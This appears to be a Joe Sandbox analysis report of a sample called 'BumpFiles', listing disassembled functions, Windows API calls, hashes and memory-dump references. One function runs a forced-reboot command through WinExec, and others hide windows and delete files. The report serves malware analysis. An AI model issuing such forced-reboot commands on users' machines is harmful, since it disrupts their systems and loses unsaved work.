API String ID: 2927643983-0
Opcode ID: 9c55607800b51c44da858b4bdd51aa229d8c941a647f02f8aa322b4bb075b0fc
Instruction ID: 5c947acfd31bbea33cc86f869339239041117c0650a59772c713c8785221c661
Opcode Fuzzy Hash: 9c55607800b51c44da858b4bdd51aa229d8c941a647f02f8aa322b4bb075b0fc
Instruction Fuzzy Hash: 3F11B97274A2752AF53020697E85F7B1104CBC2768FBB0527F955E67D1D0DC4981906E

Uniqueness

Uniqueness Score: -1.00%

Function 00406230 Relevance: 9.1, APIs: 6, Instructions: 51fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00406252
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 00406258
GetStdHandle.KERNEL32(000000F4,004053A0,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406277
WriteFile.KERNEL32(00000000,000000F4,004053A0,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 0040627D
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,004053A0,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 00406294
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,004053A0,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 0040629A

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: FileHandleWrite
String ID:
API String ID: 3320372497-0
Opcode ID: 8bd0206ba00fc98801813f9ff768997c86d6ad64ba80ef5c009afb1a176602dc
Instruction ID: 94914c835da9b27d9f252367b9cb564e513d0c16cad5d0b6ae95a77a31fa9b96
Opcode Fuzzy Hash: 8bd0206ba00fc98801813f9ff768997c86d6ad64ba80ef5c009afb1a176602dc
Instruction Fuzzy Hash: 9C0162A12057103DE610B3BA9D86F5B269CCF06728F10467E7114F61D2C57C48148FBA

Uniqueness

Uniqueness Score: -1.00%

Function 00405968 Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00405A1F
Sleep.KERNEL32(0000000A,00000000), ref: 00405A35
Sleep.KERNEL32(00000000), ref: 00405A63
Sleep.KERNEL32(0000000A,00000000), ref: 00405A79

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: a706dcada6f5eef1a9b79417e3615fb104c95944918c8e033a4465abe4e7dd09
Instruction ID: bdf7a1556342557ed6c5260c20dac2f68fef6da929d48900eeb6b1868b291bfe
Opcode Fuzzy Hash: a706dcada6f5eef1a9b79417e3615fb104c95944918c8e033a4465abe4e7dd09
Instruction Fuzzy Hash: CEC11476605B118BD715CF29E884317BBA2EB86310F1882BFD459AF3D5C3B4A881CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0063586C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21sleepprocessCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00002328,00000000,006358AB,?,:c,00639951,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?,00000000), ref: 00635882
WinExec.KERNEL32(C:\WINDOWS\system32\shutdown.exe -r -t 1 -f,00000000), ref: 0063588E
Sleep.KERNEL32(0000012C,00002328,00000000,006358AB,?,:c,00639951,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?), ref: 00635898

Strings

:c, xrefs: 0063586C
C:\WINDOWS\system32\shutdown.exe -r -t 1 -f, xrefs: 00635889

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: Sleep$Exec
String ID: C:\WINDOWS\system32\shutdown.exe -r -t 1 -f$:c
API String ID: 1325486322-1912651170
Opcode ID: 56e5e6c6a31689e77f25ce9c9ed528b2f48389242c686b60612e1fb36309e717
Instruction ID: f61db4da6c67bcbcc9485dc9ace913e51ddd331a7a87c05aa1dac2d289d3923f
Opcode Fuzzy Hash: 56e5e6c6a31689e77f25ce9c9ed528b2f48389242c686b60612e1fb36309e717
Instruction Fuzzy Hash: ABD01230794B507DF11266667C23F197B4DD38AF14FD30466F601555D195B9641044ED

Uniqueness

Uniqueness Score: -1.00%

Function 005ECAF4 Relevance: 7.6, APIs: 5, Instructions: 119COMMON

Download Yara Rule

APIs

EnumWindows.USER32(005EC9E8,00000000), ref: 005ECB32
ShowWindow.USER32(?,00000000,005EC9E8,00000000), ref: 005ECB74
ShowOwnedPopups.USER32(00000000,?), ref: 005ECBA3
ShowWindow.USER32(?,00000005), ref: 005ECC18
ShowOwnedPopups.USER32(00000000,?), ref: 005ECC47

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: Show$OwnedPopupsWindow$EnumWindows
String ID:
API String ID: 315437064-0
Opcode ID: d2616e15c94fc5aa378183f27dbc58f7b45443a5dd5726ba4afef7d475984bd8
Instruction ID: 520c65952f6602bae8faae5d5e0a6eb63dfcaab99f1881edca88c48e5b972915
Opcode Fuzzy Hash: d2616e15c94fc5aa378183f27dbc58f7b45443a5dd5726ba4afef7d475984bd8
Instruction Fuzzy Hash: D5418431604B818FD724DB3AC489BAA7BE6FB84714F550969E4ADC72E1C734EC82DB01

Uniqueness

Uniqueness Score: -1.00%

Function 006C1113 Relevance: 7.5, APIs: 5, Instructions: 43timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 006C113A
GetCurrentProcessId.KERNEL32 ref: 006C1149
GetCurrentThreadId.KERNEL32 ref: 006C1152
GetTickCount.KERNEL32 ref: 006C115B
QueryPerformanceCounter.KERNEL32(00000000), ref: 006C1170

Memory Dump Source

Source File: 00000004.00000002.2609248117.00000000006C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000004.00000002.2609181191.00000000006C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2609298581.00000000006C3000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c0000_BumpFiles.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: c72cf156af682248f2d26a458c1df79eb9f1802da01772a552171e8be8c32d09
Instruction ID: c91f01724b0962e08f8703e3fd75639b0a217a37570a1854b48db52208d56ef5
Opcode Fuzzy Hash: c72cf156af682248f2d26a458c1df79eb9f1802da01772a552171e8be8c32d09
Instruction Fuzzy Hash: 16110571E10218EBDB10DFB4DA48AAEBBF9FF08311F519896D501E7210DB349B00DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0042547C Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1), ref: 0042548C
GetLastError.KERNEL32(00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1), ref: 0042549B
GetFileAttributesW.KERNEL32(00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254A3
RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254BE
SetLastError.KERNEL32(00000000,00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254CC

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
String ID:
API String ID: 2814369299-0
Opcode ID: 18afb03090a0d0029a8166759789f8574f40b467fd75361f09ab48c2f9fad2e0
Instruction ID: ced7317d0bb7603919c6f65922b20b3b5ec63e78df0876d40d037117c1771166
Opcode Fuzzy Hash: 18afb03090a0d0029a8166759789f8574f40b467fd75361f09ab48c2f9fad2e0
Instruction Fuzzy Hash: 44F08261301B2019A91035BE28C1BBF51488DC276FB94073BF944D2292D92D4C86419E

Uniqueness

Uniqueness Score: -1.00%

Function 005EBBE8 Relevance: 7.5, APIs: 5, Instructions: 39threadCOMMON

Download Yara Rule

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 005EBBFA
SetEvent.KERNEL32(00000000), ref: 005EBC26
GetCurrentThreadId.KERNEL32 ref: 005EBC2B
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 005EBC54
CloseHandle.KERNEL32(00000000,00000000), ref: 005EBC61

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
String ID:
API String ID: 2132507429-0
Opcode ID: eb5dd2f89c71f090cece70a2ea0db19f723eae7c739ab1a321d30a1f943af5bf
Instruction ID: 3a001b7b59bab94448f4574198c486d7b1ad41d0dfc1326082cf4b057d3abe7e
Opcode Fuzzy Hash: eb5dd2f89c71f090cece70a2ea0db19f723eae7c739ab1a321d30a1f943af5bf
Instruction Fuzzy Hash: 5D012BB0108B02DFE728EB66CC49B5A3BE5BF80316F508519B0A5CB1E0DB349880C765

Uniqueness

Uniqueness Score: -1.00%

Function 00409ABC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00409AFA
FreeLibrary.KERNEL32(?,?,?,00651B9C,00651B9C,?,?,00646C38,00410843,00645860), ref: 00409B98
ExitProcess.KERNEL32(00000000,?,?,00651B9C,00651B9C,?,?,00646C38,00410843,00645860), ref: 00409BD1

Part of subcall function 00409A2C: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?,00651B9C,00651B9C,?,?,00646C38,00410843,00645860), ref: 00409A65
Part of subcall function 00409A2C: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?,00651B9C,00651B9C,?,?,00646C38,00410843), ref: 00409A6B
Part of subcall function 00409A2C: GetStdHandle.KERNEL32(000000F5,00000000,00000002,`Xd,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?,00651B9C), ref: 00409A86
Part of subcall function 00409A2C: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,`Xd,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?), ref: 00409A8C

Strings

t5B, xrefs: 00409AD2

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID: t5B
API String ID: 3490077880-2522545044
Opcode ID: dee015889ac32e6df2b25993643341ab4869c9cb8df1deab5bfee0089377f4bb
Instruction ID: 3e064d22227ce83d323fd635ef74908ee7d5fe006525e65d3825cc916af52ec8
Opcode Fuzzy Hash: dee015889ac32e6df2b25993643341ab4869c9cb8df1deab5bfee0089377f4bb
Instruction Fuzzy Hash: A7314C34A007419BDB31AB7AA88471B7BE1BB46324F14493FE485A62D3D77CEC84CB19

Uniqueness

Uniqueness Score: -1.00%

Function 0040CBB8 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON

Download Yara Rule

APIs

GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040CBC9
SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040CC27
SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040CC84
SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040CCB7

Part of subcall function 0040CB74: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040CC35), ref: 0040CB8B
Part of subcall function 0040CB74: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040CC35), ref: 0040CBA8

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: Thread$LanguagesPreferred$Language
String ID:
API String ID: 2255706666-0
Opcode ID: 72f7c58ec07244d9a8b6590b8c99882c83141c37e6ee73b2fa0aef0b244a9c62
Instruction ID: 41e4a82156dcdbea47aa592af73f03f4b3f6d906c0d9ea18ea200e93a0dd79e9
Opcode Fuzzy Hash: 72f7c58ec07244d9a8b6590b8c99882c83141c37e6ee73b2fa0aef0b244a9c62
Instruction Fuzzy Hash: 0A316D70E0421ADBDB10DBA9C8C5AAEB3B5EF05305F10427AE519EB291DB789A04CB54

Uniqueness

Uniqueness Score: -1.00%

Function 005EC9E8 Relevance: 6.1, APIs: 4, Instructions: 85threadwindowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000004), ref: 005EC9FA
GetWindowThreadProcessId.USER32(?,?), ref: 005ECA17
GetCurrentProcessId.KERNEL32(?,00000004), ref: 005ECA23
IsWindowVisible.USER32(?), ref: 005ECA7D

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: Window$Process$CurrentThreadVisible
String ID:
API String ID: 3926708836-0
Opcode ID: ae48674ec502b5c25bc1aae18e8a90669d7f96e4dd4d16030504c316246d3a25
Instruction ID: 8268e75e0adbed2169e79767f9ce143fa46dc78cab4c363f5557c18a9004b086
Opcode Fuzzy Hash: ae48674ec502b5c25bc1aae18e8a90669d7f96e4dd4d16030504c316246d3a25
Instruction Fuzzy Hash: 9A31BC71600B49DFDB20DFAAD8C5BAA7BA5BB48304F9441B6E815D7352EB30FD418B90

Uniqueness

Uniqueness Score: -1.00%

Function 005ED634 Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

SetActiveWindow.USER32(?,?,006551D0,005EE2DC), ref: 005ED662

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: ActiveWindow
String ID:
API String ID: 2558294473-0
Opcode ID: fb2bbe578685c1848e64e5aef4fcec5335ddfaafe7add0855c05a9fda4d45933
Instruction ID: 316ea7ef422e3561d401b094dd8cef2e267661bcd36d655bf6b1583c726e49ee
Opcode Fuzzy Hash: fb2bbe578685c1848e64e5aef4fcec5335ddfaafe7add0855c05a9fda4d45933
Instruction Fuzzy Hash: 9C310D706042C19BDB18FF2AC8C9B9A3BA6BF44304F1440B5BD849F29BCA74DC85C761

Uniqueness

Uniqueness Score: -1.00%

Function 005EC798 Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

EnumWindows.USER32(005EC6D4), ref: 005EC7C5
GetWindow.USER32(00000003,00000003), ref: 005EC7DD
GetWindowLongW.USER32(00000000,000000EC), ref: 005EC7EA
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 005EC829

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: Window$EnumLongWindows
String ID:
API String ID: 4191631535-0
Opcode ID: c52ffe457daee2d391e7c8c1ae88a74a5a0506567ac3227abf4ff07a4df4949a
Instruction ID: 6cfa09aa32f089a1f13344452882ebc562bbad27a0c324552ed6f96263435584
Opcode Fuzzy Hash: c52ffe457daee2d391e7c8c1ae88a74a5a0506567ac3227abf4ff07a4df4949a
Instruction Fuzzy Hash: 6811A030608750AFDB10AA1E8885FDA7A94AB46724F184168FCD8AB1D2C7709C82CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00532154 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 00532161
GetCurrentProcessId.KERNEL32(?,?,00000000,005EFD71,?,?,?,00000001,005EDF4B), ref: 0053216A
GlobalFindAtomW.KERNEL32(00000000), ref: 0053217F
GetPropW.USER32(00000000,00000000), ref: 00532196

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow
String ID:
API String ID: 2582817389-0
Opcode ID: 536c3aff569af4baeae921204661b15b761a0ff35ef730b8b780b24beb53bddb
Instruction ID: c7d3ec914ef7cc7fd85d71469748cdc3bb9cf033b4ebf6ec3ea160049ca614c5
Opcode Fuzzy Hash: 536c3aff569af4baeae921204661b15b761a0ff35ef730b8b780b24beb53bddb
Instruction Fuzzy Hash: 83F06C72300B12A6DB20B7F67DC58AB278C9D947A5F411936FA41D7141D55CCC41C3F5

Uniqueness

Uniqueness Score: -1.00%

Function 004091A6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

UnhandledExceptionFilter.KERNEL32(?,00000000), ref: 0040927A

Strings

8Q@, xrefs: 004092D6

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
